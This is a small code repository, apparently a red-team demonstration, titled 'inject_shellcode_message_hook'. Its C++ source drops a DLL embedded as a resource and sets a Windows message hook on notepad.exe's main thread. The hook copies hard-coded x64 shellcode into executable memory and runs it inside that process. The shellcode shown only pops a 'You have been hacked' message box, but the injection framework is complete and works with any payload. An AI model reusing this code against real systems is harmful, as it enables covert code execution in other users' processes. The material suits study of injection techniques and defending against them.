├── Hooks.cpp ├── LICENSE ├── NotepadHook.cpp └── README.md /Hooks.cpp: -------------------------------------------------------------------------------- 1 | //编译为64位 2 | #include 3 | #include 4 | 5 | typedef BOOL(*SetHook)(); 6 | typedef BOOL(*UnHook)(); 7 | 8 | 9 | BOOL GlobalHook(BOOL isSet) { 10 | HMODULE hModule = LoadLibrary(L"NotepadHook.dll"); 11 | if (!hModule) 12 | { 13 | printf("LoadLibrary Error:%d", GetLastError()); 14 | return FALSE; 15 | } 16 | 17 | if (isSet == TRUE) 18 | { 19 | SetHook sethook = (SetHook)GetProcAddress(hModule, "SetGlobalHook"); 20 | if (!sethook) 21 | { 22 | printf("GetProcAddress SetGlobalHook Error:%d", GetLastError()); 23 | return FALSE; 24 | } 25 | sethook(); 26 | return TRUE; 27 | } 28 | else 29 | { 30 | UnHook unhook = (UnHook)GetProcAddress(hModule, "UnsetGlobalHook"); 31 | if (!unhook) 32 | { 33 | printf("GetProcAddress UnsetGlobalHook Error:%d", GetLastError()); 34 | return FALSE; 35 | } 36 | unhook(); 37 | return TRUE; 38 | } 39 | 40 | } 41 | 42 | int main(int argc, char* argv[]) { 43 | //延迟释放:就是把dll编译进资源文件里面,在执行的时候释放 44 | HRSRC hRsrc = FindResource(0, (LPCWSTR)101, L"MYDLL"); 45 | if (!hRsrc) 46 | { 47 | printf("FindResource Error:%d", GetLastError()); 48 | return FALSE; 49 | } 50 | 51 | DWORD dwSize = SizeofResource(NULL, hRsrc); 52 | if (!dwSize) 53 | { 54 | printf("SizeofResource Error:%d", GetLastError()); 55 | return FALSE; 56 | } 57 | 58 | HGLOBAL hGlobal = LoadResource(NULL, hRsrc); 59 | if (!hGlobal) 60 | { 61 | printf("LoadResource Error:%d", GetLastError()); 62 | return FALSE; 63 | } 64 | 65 | LPVOID lpVoid = LockResource(hGlobal); 66 | if (!lpVoid) 67 | { 68 | printf("LockResource Error:%d", GetLastError()); 69 | return FALSE; 70 | } 71 | 72 | FILE* fp = NULL; 73 | fopen_s(&fp, "NotepadHook.dll", "wb+"); 74 | fwrite(lpVoid, sizeof(char), dwSize, fp); 75 | fclose(fp); 76 | 77 | BOOL bRet = NULL; 78 | bRet = GlobalHook(TRUE); 79 | if (!bRet) 80 | { 81 | printf("SetGlobalHook Error:%d", GetLastError()); 82 | return FALSE; 83 | } 84 | system("pause"); 85 | bRet = GlobalHook(FALSE); 86 | if (!bRet) 87 | { 88 | printf("UnSetGlobalHook Error:%d", GetLastError()); 89 | return FALSE; 90 | } 91 | system("pause"); 92 | return 0; 93 | 94 | } 95 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 Snowming 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /NotepadHook.cpp: -------------------------------------------------------------------------------- 1 | // NotepadHook.cpp : 定义 DLL 应用程序的入口点。 2 | //需要被编译为 x64 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #pragma data_seg("myhookhandle") 9 | HHOOK g_hHook = NULL; 10 | #pragma data_seg() 11 | #pragma comment(linker,"/SECTION:myhookhandle,RWS") 12 | 13 | 14 | HMODULE g_hModule = NULL; 15 | 16 | DWORD GetMainThreadIdFromName(LPCSTR szName); 17 | 18 | 19 | // 由进程名获取主线程ID(需要头文件tlhelp32.h) 20 | // 失败返回0 21 | DWORD GetMainThreadIdFromName(LPCSTR szName) 22 | { 23 | DWORD idThread = 0; // 进程ID 24 | DWORD idProcess = 0; // 主线程ID 25 | 26 | // 获取进程ID 27 | PROCESSENTRY32 pe; // 进程信息 28 | pe.dwSize = sizeof(PROCESSENTRY32); 29 | HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); // 获取系统进程列表 30 | if (Process32First(hSnapshot, &pe)) // 返回系统中第一个进程的信息 31 | { 32 | do 33 | { 34 | if (0 == _stricmp(pe.szExeFile, szName)) // 不区分大小写比较 35 | { 36 | idProcess = pe.th32ProcessID; 37 | break; 38 | } 39 | } while (Process32Next(hSnapshot, &pe)); // 下一个进程 40 | } 41 | CloseHandle(hSnapshot); // 删除快照 42 | if (idProcess == 0) 43 | { 44 | return 0; 45 | } 46 | 47 | // 获取进程的主线程ID 48 | THREADENTRY32 te; // 线程信息 49 | te.dwSize = sizeof(THREADENTRY32); 50 | hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0); // 系统所有线程快照 51 | if (Thread32First(hSnapshot, &te)) // 第一个线程 52 | { 53 | do 54 | { 55 | if (idProcess == te.th32OwnerProcessID) // 认为找到的第一个该进程的线程为主线程 56 | { 57 | idThread = te.th32ThreadID; 58 | break; 59 | } 60 | } while (Thread32Next(hSnapshot, &te)); // 下一个线程 61 | } 62 | CloseHandle(hSnapshot); // 删除快照 63 | return idThread; 64 | } 65 | 66 | 67 | 68 | 69 | BOOL APIENTRY DllMain(HMODULE hModule, 70 | DWORD ul_reason_for_call, 71 | LPVOID lpReserved 72 | ) 73 | { 74 | switch (ul_reason_for_call) 75 | { 76 | case DLL_PROCESS_ATTACH: 77 | g_hModule = hModule; 78 | case DLL_THREAD_ATTACH: 79 | case DLL_THREAD_DETACH: 80 | case DLL_PROCESS_DETACH: 81 | break; 82 | } 83 | return TRUE; 84 | } 85 | 86 | LRESULT MyFunction(int code, WPARAM wParam, LPARAM lParam) { 87 | unsigned char shellcode[] = 88 | "\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41\x51" 89 | "\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x3e\x48" 90 | "\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72\x50\x3e\x48" 91 | "\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02" 92 | "\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e" 93 | "\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88" 94 | "\x00\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b\x48" 95 | "\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48\xff\xc9\x3e" 96 | "\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41" 97 | "\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24" 98 | "\x08\x45\x39\xd1\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0" 99 | "\x66\x3e\x41\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e" 100 | "\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41" 101 | "\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41" 102 | "\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7\xc1" 103 | "\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e\x4c\x8d" 104 | "\x85\x33\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83\x56\x07\xff" 105 | "\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48" 106 | "\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13" 107 | "\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x59\x6f\x75\x20\x68" 108 | "\x61\x76\x65\x20\x62\x65\x65\x6e\x20\x68\x61\x63\x6b\x65\x64" 109 | "\x20\x5e\x5f\x5e\x00\x49\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20" 110 | "\x57\x61\x72\x6e\x69\x6e\x67\x21\x00"; 111 | void* exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 112 | memcpy(exec, shellcode, sizeof shellcode); 113 | ((void(*)())exec)(); 114 | return CallNextHookEx(g_hHook, code, wParam, lParam); 115 | } 116 | 117 | EXTERN_C __declspec(dllexport) BOOL SetGlobalHook() { 118 | g_hHook = SetWindowsHookEx(WH_GETMESSAGE, (HOOKPROC)MyFunction, g_hModule, GetMainThreadIdFromName("notepad.exe")); 119 | if (!g_hHook) 120 | { 121 | return FALSE; 122 | } 123 | return TRUE; 124 | } 125 | 126 | EXTERN_C __declspec(dllexport) BOOL UnsetGlobalHook() { 127 | if (g_hHook) 128 | { 129 | UnhookWindowsHookEx(g_hHook); 130 | } 131 | return TRUE; 132 | } 133 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # inject_shellcode_message_hook 2 | inject shellcode into remote process via message hook 3 | --------------------------------------------------------------------------------